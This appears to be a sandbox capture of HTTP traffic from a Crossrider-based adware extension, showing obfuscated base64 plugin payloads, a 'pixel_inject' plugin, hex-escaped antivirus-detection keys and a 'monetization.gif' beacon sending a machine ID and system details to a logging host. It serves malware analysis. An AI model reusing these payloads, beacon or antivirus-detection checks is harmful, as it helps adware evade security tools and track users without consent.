    se visit our docs site: hXXp://docs.crossrider.com.*******************
    ******************************************************************/..a
    ppAPI.ready(function($) {..    // Place your code here (you can also d
    efine new functions above this scope).    // The $ object is the exten
    sion's jQuery object..    // alert("My new Crossrider extension works!
     The current page is: "   document.location.href);..});..    ....


    GET /plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=9830 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:27 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1452026982"
    Last-Modified: Tue, 05 Jan 2016 20:49:42 GMT
    Cache-Control: max-age=900
    Content-Length: 432
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422147.dop015.fr7.t,1456422147.cds009.fr7.pr
    ../*******************************************************************
    *****************.  This is your background code..  For more informati
    on please visit our wiki site:.  hXXp://docs.crossrider.com/#!/guide/s
    copes_background.*****************************************************
    ********************************/..appAPI.ready(function($) {..  // Pl
    ace your code here (ideal for handling browser button, global timers, 
    etc.)..});..    ....


    GET /plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=5028 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1452026983"
    Last-Modified: Tue, 05 Jan 2016 20:49:43 GMT
    Cache-Control: max-age=900
    Content-Length: 15403
    Content-Type: text/plain; charset=UTF-8
    X-HW: 1456422148.dop015.fr7.t,1456422148.cds060.fr7.pr
    {.."plugins_version": 128,.."plugins_list":.    [.      {"id":4,"url":
    "hXXp://js.newcloudrack.com/plugins/javascripts/jquery-1_7_1_min.js","
    ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":true
    ,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":10200},
    {"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"order":
    10200}],"enabled":true},{"id":2,"url":"hXXp://js.newcloudrack.com/plug
    ins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true,"ff":f
    alse,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at"
    :1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{"id":3,
    "url":"hXXp://js.newcloudrack.com/plugins/mins/3.js","ver":2,"name":"i
    e8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":
    false,"px":false},"targets":[{"run_at":1,"order":10300},{"run_at":2,"o
    rder":10300}],"enabled":true},{"id":47,"url":"hXXp://js.newcloudrack.c
    om/plugins/mins/47.js","ver":3,"name":"resources_background","browsers
    ":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"tar
    gets":[{"run_at":0,"order":30000},{"run_at":5,"order":30000}],"enabled
    ":true},{"id":246,"url":"hXXp://js.newcloudrack.com/plugins/mins/246.j
    s","ver":17,"name":"setup","browsers":{"ie":true,"ff":true,"ch":true,"
    sf":true,"nv":true,"px":true},"targets":[{"run_at":0,"order":5},{"run_
    at":1,"order":5}],"enabled":true},{"id":253,"url":"hXXp://js.newcloudr
    ack.com/plugins/mins/253.js","ver":2,"name":"pixel_inject","browsers":
    {"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"tar
    <<< skipped >>>

    GET /plugins/mins/390.js?ver=1&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1425996283"
    Last-Modified: Tue, 10 Mar 2015 14:04:43 GMT
    Cache-Control: max-age=900
    Content-Length: 823
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop015.fr7.t,1456422148.cds072.fr7.c
    if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMD
    MxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBh
    MGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNT
    JlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0
    MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMz
    YyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIz
    MTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNj
    BlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2Uz
    YjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMm
    UyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4
    MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMD
    A4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }    ....


    GET /plugins/mins/391.js?ver=1&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1426068985"
    Last-Modified: Wed, 11 Mar 2015 10:16:25 GMT
    Cache-Control: max-age=900
    Content-Length: 795
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop015.fr7.t,1456422148.cds072.fr7.c
    if (typeof setup2 === 'function') { setup2('MTk0YjAwMWYwMTE3MmQxYTFlNT
    M1ODRiMDAxZjAxMTc0MjQ3NWQxMjA2MDcwYjBhMTYwZjFkNDUxMzVmMDMwMjA5MDYxNDBl
    MTAwYzVjMWYwNzFkNDcxODAwMDU1NzAwNDI0ODVhNWIwYTBlNWEzODI3MmIyMDNlMzEzYT
    NhMjIzMTIyMmEzNzM3MjkzNjJjMjYyZjMwMjMyNzNiMjczMzNkMjAyYzM0MmE0ODE0NDYx
    ODAyNWQxOTAxMGY0ODU1NGE1MTQ2NTcwNzExMWM1NjJhMzgzYjNhM2QyMjMxM2IyMTJmMz
    AzNTI3MjkyMjIxM2QyNzI5MjYzMDM4Mjc0YTVlNTMwYTFkMWMxYjA2MzIwYTA0NTA0YjQw
    MDExYzFmMDUxNDQyNDc1ZDEyMDYwNzBiMGExNjBmMWQ0NTEzNWYwMzAyMDkwNjE0MGUxMD
    BjNWMxZjA3MWQ0NzE4MDAwNTU3MDA0MjQ4NWE1YjBhMGU1YTM4MjcyYjIwM2UzMTNhM2Ey
    MjMxMjIyYTM3MzcyOTM2MmMyNjJmMzAyMzI3M2IyNzMzM2QyMDJjMzQyYTQ4MTQ0NjE4MD
    I1ZDE5MDEwZjQ4NTU0YTUxNDY1NzA3MTExYzU2MmEzODNiM2EzZDIyMzEzYjIxMmYzMDM1
    MjcyOTIyMjEzZDI3MjkyNjMwMzgyNzRhNWU1MzEyMDUxZDBjMWMwOTMxMGM1MDRiNTE1MD
    U5MTY=', 'bihkugxhrq'); }    ....


    GET /plugins/mins/200.js?ver=6&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1439709638"
    Last-Modified: Sun, 16 Aug 2015 07:20:38 GMT
    Cache-Control: max-age=900
    Content-Length: 887
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop015.fr7.t,1456422148.cds054.fr7.c
    if (typeof setup2 === 'function') { setup2('MGM2ZDZhNGUxMTAyMWUxZjI0MW
    YxYjQ1NTk0YzViMWUxZTFiMDE1NzU4NDgxMTE5MTUxMzE5NDEwMjA0MWEwZTBmMGQwYjEy
    MGYwZTFkMWU1OTA5MDYxODU2MDA1YjQxNDE0MjAwMGYwYTE4MWMxYTAzMWMwNTQyNDY1Nz
    U0NWM1NjI5MzUyYzIzMjIyNDM0MzEyNTNkMzMzODMwMzQzNTIzMjIyZDI4M2MzMjM1M2My
    NDJmMjgyZTI3MzMyNjU5MzUzMDM1MjIzYTI2MmEyMjI2Mjk1NTFmMTAxZjAzMDkwNjFlMz
    cxNzA3MGE0YzMyMjgyNDMxMjMyYTI1MzgyNjM1MjgyNTM4MjIzYzI5MjkyNDJlM2MyODI4
    Mzg0MTQwNzM3ZjQ4MDcwNTE5MDcxNDM2MWUxNTU0NTA0ZjUzMDUwMzEzMTMxZjQzNTk0NT
    FkMDQwMTEyMTQ0ZDFmMTAxYjAzMDMxMDFmMTMwMjAyMDAwYTU4MDQwYTA1NDIwMTU2NGQ1
    YzU2MDEwMjA2MDUwODFiMGUxMDE4NTY0NzVhNTg0MTQyMjgzODIwM2UzNjI1MzkzZDM4Mj
    kzMjM1M2MyOTIxMjIyZjIxMzUyODMzMzgzMDM5M2IyOTIzMmIyZTMyNTgzODNjMjgzNjNi
    MmIyNjNmMzIyODU4MTMwZDBiMDIwNDBhMDMyMzE2MGEwNjUxMjYyOTI5M2QzZTNlMjQzNT
    JhMjgzYzI0MzUyZTIxM2QyODI5MjIyMTNjMjkzNTRkNWQ2NzdlNDUxMzAwMGMxMTAzMDEz
    ODA5NTU1ZDQzNWU0OTQ2NjAxMg==', 'wgclyvjoqm'); }    ....


    GET /plugins/mins/288.js?ver=4&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1426880306"
    Last-Modified: Fri, 20 Mar 2015 19:38:26 GMT
    Cache-Control: max-age=68
    Content-Length: 963
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop015.fr7.t,1456422148.cds041.fr7.c
    if (typeof setup2 === 'function') { setup2('MWU2NzVhNWE1NDQ1NTMxYjE5MT
    cxNTM4MDgxNjU2NWY1MTUxMDUxNzExMWQ0MDU1NWIwYzAyMDcwYzE3MGMwZTU0MWYwNzBk
    MWUwMzBlMGMwODFkNTQxOTFiMDg1ZTE1MDI0YzA4MDQxNDU1MTcxNzAwMTA0MzA5MTY1Mj
    EyMTMxMDU4MmUyYzJlMzEyYTNlMjkyODNkMjEzNDIxMzIzNjM2MjgyODI1M2QyMTJlMmM0
    YjAxMGIwYzE3MWY0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMmMzMzM1MzIzNDNiMz
    kyMDJlMmM0YjEwMTAwZjEzMWU0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMjgzYjMx
    MjgzNDNlMzEyMTJlMjAzODIxM2EyNDNlMjUyYjQ3NWQ3OTRkNDM0NTRkNTgxMjAwMTEwMT
    AwMzgxMTA5NGY0MDVhNTYwZDA1MDcxZDEwNWY0MjU1MTMwNzExMTAwNzA0MDA0YjA4MDkx
    MjFiMTUxMjFjMDAxMzRiMGUxNTE3NWIwMzFlNWMwMDBhMGI0MjE5MDgwNTA2NWYxOTFlNW
    MwZDA0MWU0NzJiM2EzMjIxMjIzMDM2M2YzMzNlMzEzNzJlMjYzZTI2MzczMjMzM2UyYjNh
    NTcxMTAzMDIwODA4NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTMwMjMzZDNjMmIyYz
    M3M2YyYjNhNTcwMDE4MDEwYzA5NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTM0MmIz
    OTI2MmIyOTNmM2UyYjM2MjQzMTMyMmEyMTMyMjU1ODU4NmY1MTUzNGQ0MzQ3MWQxNjBmMT
    MwYzFmM2EwOTQxNWY0ZDQ4NDI0YzZmMGM=', 'emzzteqsmc'); }    ....


    GET /plugins/mins/339.js?ver=3&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1425914750"
    Last-Modified: Mon, 09 Mar 2015 15:25:50 GMT
    Cache-Control: max-age=900
    Content-Length: 1079
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop015.fr7.t,1456422148.cds054.fr7.c
    if (typeof setup2 === 'function') { setup2('MWY2NzQzNTk0YjQzNDExMDAzMD
    QxNDM4MTExNTQ5NTk0MzVhMWYwNDEwMWQ1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2
    MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZT
    MxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkx
    YTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NG
    QwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjEx
    MWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMT
    I3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTBiMTcwYzA3MDMzMTFmMGY1
    YjUxNDM0MTEwMDMwNDE0MWU1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MT
    MwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2
    MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMj
    NjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUy
    ODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNT
    YzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIx
    M2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTEzMGYwZDEwMTkwYTI0MDc1YjUxNDM1MD
    RiNGU3YTE5', 'dmcykccxwp'); }    ....


    GET /plugins/mins/220.js?ver=46&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1433161463"
    Last-Modified: Mon, 01 Jun 2015 12:24:23 GMT
    Cache-Control: max-age=900
    Content-Length: 40450
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop015.fr7.t,1456422148.cds007.fr7.c
    if(appAPI.isBackground){var ICMBaseManager=function(a){return function
    (){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(
    function(){var z={"\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1
    ,"\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2,"\x61\x7
    6\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4,"\x6D\x73\x65\x5F
    \x64\x65\x74\x65\x63\x74\x65\x64":8,"\x65\x73\x65\x74\x5F\x64\x65\x74\
    x65\x63\x74\x65\x64":16,"\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\
    x74\x65\x64":32,"\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\
    x64":64,"\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\
    x63\x74\x65\x64":128,"\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65
    \x63\x74\x65\x64":256,"\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x7
    4\x65\x63\x74\x65\x64":512,"\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x
    65\x63\x74\x65\x64":1024,"\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65
    \x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2048,"\x62\x61\x69\x64\x75\x
    61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4096,"\x73\x70\x61\x72\x6B
    \x5F\x62\x61\x69\x64\x75\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8192,"\x
    62\x32\x63\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65
    \x63\x74\x65\x64":16384,"\x63\x72\x6F\x73\x73\x72\x69\x64\x65\x72\x5F\
    x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x6
    4":32768,"\x79\x6F\x6E\x74\x6F\x6F\x5F\x64\x65\x74\x65\x63\x74\x65\x64
    ":65536,"\x61\x76\x67\x5F\x73\x61\x66\x65\x67\x75\x61\x72\x64\x5F\x64\
    x65\x74\x65\x63\x74\x65\x64":131072,"\x67\x65\x65\x6B\x5F\x62\x75\
    <<< skipped >>>

    GET /plugins/mins/180.js?ver=20&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1450608507"
    Last-Modified: Sun, 20 Dec 2015 10:48:27 GMT
    Cache-Control: max-age=125
    Content-Length: 1407
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop015.fr7.t,1456422148.cds027.fr7.c
    if (typeof setup2 === 'function') { setup2('MTY2MDcxNDQwMTBlMTkwMjM3MT
    QwMTQ4NDI0NjRiMTIxOTA2MTI1YzQyNDUxOTQ4MWExNDAyMDUxMjBhMGMwNDFkMTU0NzE5
    MDIxZjRkMDc0MzFhMTAxNjU2NGM1ZjQ0MTAwMzBiNTg0NTM5MzYzOTNmM2QzMTM1M2YyMz
    NjMjMzYjI1MjgyYTM2MjMyMzJlM2QyMjM2MjkzODMwM2QyZjI5MzUyNzQwNWY0ODViM2Mw
    MzBiMDg1NzI3MzkyYTI4MjIyMTMxMzQyNDJlM2QzNDM2M2IzZDIyM2QyODJjMjczZDM5Mz
    Y1YzViNDA1NDE0MDgwYzRiNWIzNjI1MmUyMDJkMzUzZTM4MzEyMjJjMjgzMjI3MzEyMzNm
    MzUzMTIyMzYyNTRiNDQ1MDUwMWYwZjFlNTc1NDRjNWU0NTUwNTAwYjVkNGI1MTVhNGQ1Zj
    Q0NWI1MDU5NWM0ZDUxNWI1YzE5MTcwYjAyNTAzNTI3MjUzYjM1M2UyMTMwMmYyOTJmMmEz
    OTI4MmEzZDJkMmIyMjMyMzU1ZTEyMWMxMzA5NGYzZDM5MmUzODM3MzUzYTI4MjQzNjI3Mz
    QzMjIzMzYzNTNkM2IyMTNlMjczNDMyM2YyYjIzM2IyNTI0MzYzZDM5NGY0NjcyNmY0YjEy
    MTkwNjEyMTUzODE4MTQ0NDUzNWE0ZjFhMTYxMjFkMTk0MjQ5NDYxYjQzMDEwYzA5MWExYT
    E0MDcwNzFmMWU1YzAxMDkwMDQ1MTk0ODE5MTIxZDRkNTQ1NDViMTgxZDAwNWI0NzMyMmQy
    MTM0MjIzOTJiMzQyMDNlMjgyMDNkMjMzNTNlM2QyODJkM2YyOTJkMzEzMzJmMzUzMTIyMz
    YyNTRiNDQ1MDUwMjMwYjE1MDM1NDI1MzIzMTMwMjkzZTM5MmEyZjJkM2YzZjJkMjMzNjNk
    MzUzNjI3MjQzZjMyMmQ0NDUwNWY1YzBhMDMwZjQ5NTAyZDNkMjUzZjI1MmIzNTNiMzMyOT
    M3MzAzOTM4MzkzZDM0MzYzMzI5MmQzZDQwNWI1ODRlMTQwYzFjNWM0ZjU0NTU1YTU4NGUw
    MDVlNDk1YTQxNTU1NDViNTM0ZTUyNWY0ZjVhNDA0NDEyMDgwMzFjNWIzNjI1MmUyMDJkMz
    UzZTM4MzEyMjJjMjgzMjMzMzIzNjMyMjMzYzM5MzY1YzE5MDcwYjAyNTAzNTI3MjUzYjM1
    M2UyMTMwMmYyOTJmMmEzOTIwMzQzZTI2MjMyYTIxMmYyYTM5M2MyOTI4MjAzZDJmMjkzNT
    I3NDQ0NTcwNjQ1MDEyMGExODBkMTEwODIwMWU0ZjQ4NDI1NzU1NWE3MjFi', 'mjxfizmr
    bf'); }    ....
    <<< skipped >>>

    GET /plugins/mins/91.js?ver=186&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1451210071"
    Last-Modified: Sun, 27 Dec 2015 09:54:31 GMT
    Cache-Control: max-age=441
    Content-Length: 188421
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop015.fr7.t,1456422148.cds012.fr7.c
    (function(M){window.__loaderIsRunning__=false;var A=[].slice;var z={};
    var a=function(at){if(typeof at=="string"&&typeof at.trim=="function")
    {return at.trim();}return at==null?"":at.toString().replace(/^\s /,"")
    .replace(/\s $/,"");};function f(at){var au=z[at]={},av,aw;at=at.split
    (/\s /);for(av=0,aw=at.length;av<aw;av  ){au[at[av]]=true;}return a
    u;}var H=function(at,au){var aw=[];for(var av=0;av<at.length;av  ){
    if(av in at){var ax=au(at[av],av,at);if(ax!=null){aw.push(ax);}}}retur
    n aw;};var ad=function(aw,az,av){var au,ax=0,ay=aw.length,at=ay===unde
    fined||appAPI.utils.isFunction(aw);if(av){if(at){for(au in aw){if(az.a
    pply(aw[au],av)===false){break;}}}else{for(;ax<ay;){if(az.apply(aw[
    ax  ],av)===false){break;}}}}else{if(at){for(au in aw){if(az.call(aw[a
    u],au,aw[au])===false){break;}}}else{for(;ax<ay;){if(az.call(aw[ax]
    ,ax,aw[ax  ])===false){break;}}}}return aw;};var J=function(av){av=av?
    (z[av]||f(av)):{};var aA=[],aB=[],aw,ax,au,ay,az,aD=function(aE){var a
    F,aI,aH,aG,aJ;for(aF=0,aI=aE.length;aF<aI;aF  ){aH=aE[aF];aG=appAPI
    .utils.isArray(aH)?"array":(appAPI.utils.isFunction(aH)?"function":"")
    ;if(aG==="array"){aD(aH);}else{if(aG==="function"){if(!av.unique||!aC.
    has(aH)){aA.push(aH);}}}}},at=function(aF,aE){aE=aE||[];aw=!av.memory|
    |[aF,aE];ax=true;az=au||0;au=0;ay=aA.length;for(;aA&&az<ay;az  ){if
    (aA[az].apply(aF,aE)===false&&av.stopOnFalse){aw=true;break;}}ax=false
    ;if(aA){if(!av.once){if(aB&&aB.length){aw=aB.shift();aC.fireWith(aw[0]
    ,aw[1]);}}else{if(aw===true){aC.disable();}else{aA=[];}}}},aC={add
    <<< skipped >>>

    GET /plugins/mins/253.js?ver=2&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:29 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1417718237"
    Last-Modified: Thu, 04 Dec 2014 18:37:17 GMT
    Cache-Control: max-age=900
    Content-Length: 735
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422149.dop015.fr7.t,1456422149.cds049.fr7.c
    if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MT
    gxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBm
    NGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MD
    dmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQx
    MTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1Mj
    UyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3
    MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMz
    U2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYw
    OTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMD
    QxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAz
    NDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }..

    

    GET /monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=1456422014 HTTP/1.1
    Host: logs.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:15 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1389114507"
    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1456422135.dop003.fr7.t,1456422135.cds050.fr7.c
    GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 25 Feb 
    2016 17:42:15 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Al
    ive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 
    Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 3
    5..Content-Type: image/gif..X-HW: 1456422135.dop003.fr7.t,1456422135.c
    ds050.fr7.c..GIF89a.............,...........D..;..

    

    GET /ThawteTimestampingCA.crl HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: crl.thawte.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Server: Apache
    ETag: "ed105ad04f9762dff775f597758fe83a:1450503189"
    Last-Modified: Sat, 19 Dec 2015 05:15:01 GMT
    Date: Thu, 25 Feb 2016 17:42:19 GMT
    Content-Length: 341
    Connection: keep-alive
    Content-Type: application/pkix-crl
    0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U..
    ..Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U..
    ..Thawte Timestamping CA..151217000000Z..160331235959Z0...*.H.........
    .....X...;J..b. ..>..P.T....u.^q;C..*8.....*!3......tZ<.Z......-
    ....T...........>E2.....'s.ij.GL.........h.NNb.8.G..$.. u.7.....22.
    HTTP/1.1 200 OK..Server: Apache..ETag: "ed105ad04f9762dff775f597758fe8
    3a:1450503189"..Last-Modified: Sat, 19 Dec 2015 05:15:01 GMT..Date: Th
    u, 25 Feb 2016 17:42:19 GMT..Content-Length: 341..Connection: keep-ali
    ve..Content-Type: application/pkix-crl..0..Q0..0...*.H........0..1.0..
